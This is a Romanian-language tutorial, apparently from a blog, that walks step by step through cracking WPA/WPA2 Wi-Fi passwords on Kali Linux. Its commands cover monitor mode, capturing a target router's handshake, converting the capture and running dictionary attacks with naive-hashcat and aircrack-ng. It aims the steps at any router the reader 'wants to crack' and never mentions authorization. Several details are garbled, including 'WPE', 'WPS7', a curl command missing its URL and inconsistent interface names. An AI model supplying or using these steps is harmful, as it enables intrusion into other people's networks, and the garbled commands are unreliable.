Kali Linux WPA și WPA2 Atacuri

Acest articol vă va oferi o privire de ansamblu asupra Wi-Fi și a hacking-ului Wi-Fi. Vom începe cu o introducere de bază a Wi-Fi și a hacking-ului.

Introducere

Fidelitatea fără fir, sau Wi-Fi, este un tip de tehnologie folosită pentru a oferi conectivitate la o rețea de calculatoare fără un cablu sau o conexiune prin cablu dur. Wi-Fi funcționează în gama de frecvențe de la 2,4 Ghz la 5 Ghz și nu ar trebui să interfereze cu telefoanele celulare, radiourile de radiodifuziune, televiziunea sau radiourile portabile. Wi-Fi funcționează prin transmiterea de date prin unde radio între un dispozitiv client și un dispozitiv numit router. Un router poate transmite date către sisteme interne sau externe, către internet. Wi-Fi nu este nici mai mult, nici mai puțin sigur decât o rețea tradițională cu fir, ci reprezintă o interfață complet diferită. Cel mai important lucru de reținut este că Wired Equivalent Privacy (WEP) a fost lansat în 1997 și este ușor de spart. WEP poate fi spart în câteva minute sau mai puțin. Dispozitivele dvs. moderne nu vor funcționa cu rețeaua WEP, iar majoritatea routerelor nu o mai acceptă. WEP-ul actualizat poate fi spart și prin metode de hacking.

Hacking

Simplu spus, spargerea sau pătrunderea în informațiile personale ale cuiva este cunoscută sub numele de hacking. Hackerii pot avea acces cu ușurință la dispozitivul personal sau la computerul dumneavoastră. Ei vă pot sparge codurile de acces și pot obține acces la rețeaua dvs. wireless. Ei pot să ocolească securitatea rețelei wireless și să pătrundă, indiferent de tipul de criptare pe care îl folosește utilizatorul.

În mod obișnuit, dacă doriți să pătrundeți în rețeaua wireless a cuiva, va trebui mai întâi să știți despre criptarea folosită. După cum am menționat mai devreme, rețeaua de tip WPE nu mai este sigură de ceva timp. În general, aceasta poate fi spartă în câteva minute. Același lucru este valabil și pentru rețeaua WPA, dacă folosiți o parolă slabă. Cu toate acestea, dacă folosiți o parolă puternică, aceasta este relativ sigură, cu excepția PIN-ului WPS7. Aceasta este o vulnerabilitate de bază hardware pe care o mulțime de routere o folosesc, permițând hackerilor să obțină codul PIN care oferă acces complet la router. Acesta este, de obicei, un număr de opt cifre scris în partea de jos a routerului. Puteți obține acest număr urmând pașii de mai jos.

Deschideți terminalul Kali Linux

Primul pas este să deschideți pur și simplu terminalul Kali Linux. Pentru a face acest lucru, apăsați ALT+CTRL+T. De asemenea, puteți apăsa pe pictograma aplicației terminal pentru a deschide terminalul.

Introduceți comanda pentru instalarea aircrack-ng

Postul următor este să instalați aircrack-ng. Introduceți următoarea comandă pentru a face acest lucru:

$ sudo apt-get install aircrack-ng

Introduceți parola pentru conectare

Introduceți parola de root pentru a activa accesul. După introducerea parolei de conectare, apăsați butonul Enter pentru a continua.

Instalează aircrack-ng

La scurt timp după conectare, apăsați butonul Y. Acest lucru va activa instalarea aircrack-ng.

Turn on airmon-ng

Airmon-ng este software-ul utilizat pentru a converti modul gestionat în modul monitor. Utilizați următoarea comandă pentru a porni airmon-ng:

$ airmon-ng

Găsește numele monitorului

Postul următor este de a găsi numele monitorului pentru a continua hacking-ul. Puteți vizualiza numele monitorului în coloana de interfață. În unele cazuri, este posibil să nu puteți vizualiza numele monitorului. Această eroare apare dacă placa dvs. nu este suportată.

Begin Monitoring the Network

Introduceți următoarea comandă pentru a începe procesul de monitorizare:

$ airmon-ng start wlan0

Dacă vizați o altă rețea, atunci trebuie să înlocuiți „wlan0” cu numele corect al rețelei.

Activați interfața în modul monitor

Comenda următoare este utilizată pentru a activa interfața în modul monitor:

$ iwconfig

Ucideți procesele care returnează erori

Sistemul dvs. poate provoca unele interferențe. Utilizați următoarea comandă pentru a elimina această eroare.

$ airmon-ng check kill

Revizuiți interfața monitorului

Pasul următor este să revizuiți numele monitorului. În acest caz, acesta se numește „wlan0mon.”

Get Names of All Routers

Numele tuturor routerelor disponibile vor apărea după ce introduceți următoarea comandă.

$ airodump-ng mon0

Căutați numele routerului

În primul rând va trebui să găsiți numele routerului specific pe care doriți să îl spargeți.

Asigurați-vă că routerul folosește securitatea WPA sau WPA2

Dacă numele WPA apare pe ecran, atunci puteți continua hacking-ul.

Rețineți adresa MAC și numărul canalului.

Acestea sunt informațiile de bază despre rețea. Le puteți vizualiza în partea stângă a rețelei.

Monitorizarea rețelei selectate

Utilizați următoarea comandă pentru a monitoriza detaliile rețelei pe care doriți să o spargeți.

$ airodump-ng -c channel –bssid MAC -w /root/Desktop/ mon0

Așteptați pentru Handshake

Așteptați până când vedeți scris pe ecran ‘WPA HANDSHAKE’.

Ieșiți din fereastră apăsând CTRL+C. Un fișier cap va apărea pe ecranul computerului dumneavoastră.

Renumiți fișierul cap

Pentru ușurința dumneavoastră, puteți edita numele fișierului. Utilizați următoarea comandă în acest scop:

$ mv ./-01.cap nume.cap

Convertiți fișierul în format hccapx

Puteți converti fișierul în format hccapx cu ușurință cu ajutorul convertorului Kali.

Utilizați următoarea comandă pentru a face acest lucru:

$ cap2hccapx.bin name.cap name.hccapx

Instalați naive-hash-cat

Acum, puteți sparge parola folosind acest serviciu. Utilizați următoarea comandă pentru a începe spargerea.

$ sudo git clone https://github.com/brannondorsey/naive-hashcat
$ cd naive-hash-cat

$ curl -L -o dicts/rockyou.txt

Executați naive-hash-cat

Pentru a rula serviciul naive-hash-cat, introduceți următoarea comandă:

$ HASH_FILE=nume.hccapx POT_FILE=name.pot HASH_TYPE=2500 ./naive-hash-cat.sh

Așteptați ca parola de rețea să fie spartă

De îndată ce parola este spartă, aceasta va fi menționată în fișier. Acest proces poate dura luni sau chiar ani de zile pentru a se finaliza. Introduceți următoarea comandă atunci când acest proces se finalizează pentru a salva parola. Parola spartă este prezentată în ultima captură de ecran.

$ aircrack-ng -a2 -b MAC -w rockyou.txt name.cap

Concluzie

Prin utilizarea Kali Linux și a instrumentelor sale, hacking-ul poate deveni ușor. Puteți obține cu ușurință accesul la parole doar urmând pașii enumerați mai sus. Sperăm că acest articol vă va ajuta să spargeți parolele și să deveniți un hacker etic.

.

Lasă un răspuns

Adresa ta de email nu va fi publicată.